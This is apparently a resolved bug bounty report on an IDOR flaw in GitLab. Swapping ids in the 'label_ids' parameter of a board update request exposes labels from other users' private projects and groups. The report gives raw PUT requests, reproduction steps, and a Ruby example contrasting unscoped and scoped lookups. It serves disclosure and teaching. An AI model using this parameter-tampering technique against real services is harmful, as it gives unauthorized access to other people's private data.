Add and Access to Labels of any Private Projects/Groups of Gitlab(IDOR)
Low
GitLab
Reported by indoappsec
Vulnerability Details
Technical details and impact analysis
**Summary & Description:**
If you have a private project or private group, no non-member should be able to access any of its information. However, the API request that adds labels to a private board is vulnerable to IDOR, which allows labels of a private group or project to be added to another board and accessed from there.
## Vulnerable Request for Project:
```
PUT /[username]/[project_name]/boards/[board_id].json HTTP/1.1
Host: gitlab.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Content-Length: 178
Connection: close
Cookie: [Cookies]
{"board":{"id":857058,"name":"Development","labels":[{"id":,"title":"","color":"#428BCA"}],"milestone_id":null,"assignee":{},"weight":null,"label_ids":[[Label_ID]]}}
```
Vulnerable parameter: `label_ids` (value `Label_ID`)
## Vulnerable Request for Group:
```
PUT /groups/vijaykumar007Publicgroup/-/boards/848604.json HTTP/1.1
Host: gitlab.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Content-Length: 186
Connection: close
Cookie: [Cookies]
{"board":{"id":848604,"name":"Developmenthacked","labels":[{"id":,"title":"","color":"#F0AD4E"}],"milestone_id":null,"assignee":{},"weight":null,"label_ids":[label_ID]}}
```
Vulnerable parameter: `label_ids` (value `label_ID`)
## Steps To Reproduce:
Take two different accounts to reproduce this issue. Also, I am using a project for reproduction.
1. Log in from the victim account and create a project.
2. Make the project private, do not add any member, and remove all public permissions so that no permissions get mixed up.
3. Create a new label (Victim_label, ID: 12345).
4. Now log in from the attacker account and try to access the victim project.
5. You will notice that you are not able to access the victim project.
6. Now create a new project and go to Labels.
7. Create a new label and go to Boards.
8. Edit the board and you will see the label section.
9. Add the label to the board and intercept the save request.
10. The request will look like the request shown above.
11. Change the label ID in the "label_ids" parameter to victim_label_ID and send the request.
12. You will notice that the private label is added to the board and you are able to access it.
The same applies to private groups.
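The server-side pattern behind this finding, as an added example that is not GitLab's own code: a board update that takes `label_ids` and resolves them without scoping, beside one that only resolves ids within the set of labels the board's project may reference and rejects anything else. The data model, the `PROJECTS`/`LABELS` tables and the label ids 200 and 300 are assumptions; 12345 is the victim label id from the reproduction steps above.

```ruby
# Added illustration (not GitLab's code): minimal model of a board update
# accepting label_ids, showing the unscoped lookup beside a scoped one.
Label   = Struct.new(:id, :title, :project_id, :group_id)
Project = Struct.new(:id, :group_id, :members)
Board   = Struct.new(:id, :project_id, :label_ids)

# Constructed sample data: victim's private project 1 (label 12345, as in the
# report), attacker's project 2 (label 200), and a group-level label 300.
LABELS = {
  12345 => Label.new(12345, "Victim_label", 1, nil),
  200   => Label.new(200, "Attacker_label", 2, nil),
  300   => Label.new(300, "Group_label", nil, 9),
}
PROJECTS = {
  1 => Project.new(1, 9, [:victim]),
  2 => Project.new(2, 7, [:attacker]),
}

# Vulnerable pattern: every label id the client sends is attached, no matter
# which project or group owns it. Existence is the only check.
def update_board_unscoped(board, label_ids)
  board.label_ids = label_ids.select { |id| LABELS.key?(id) }
  board
end

# Labels a board may legitimately reference: those defined on its own project
# plus those defined on the project's parent group.
def labels_available_to(project)
  LABELS.values.select do |l|
    l.project_id == project.id || (l.group_id && l.group_id == project.group_id)
  end.map(&:id)
end

# Hardened pattern: authorize the caller on the board's project first, then
# resolve ids only inside that project's label scope. Foreign ids are rejected
# outright rather than silently dropped, so a tampered request fails loudly
# and the rejection can be logged.
def update_board_scoped(user, board, label_ids)
  project = PROJECTS.fetch(board.project_id)
  raise "forbidden" unless project.members.include?(user)
  foreign = label_ids - labels_available_to(project)
  raise ArgumentError, "label ids outside project scope: #{foreign}" unless foreign.empty?
  board.label_ids = label_ids
  board
end
```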
## Impact
Add and Access to Labels of any Private Projects/Groups of Gitlab(IDOR)
Report Details
Additional information and metadata
State: Closed
Substate: Resolved
Weakness: Insecure Direct Object Reference (IDOR)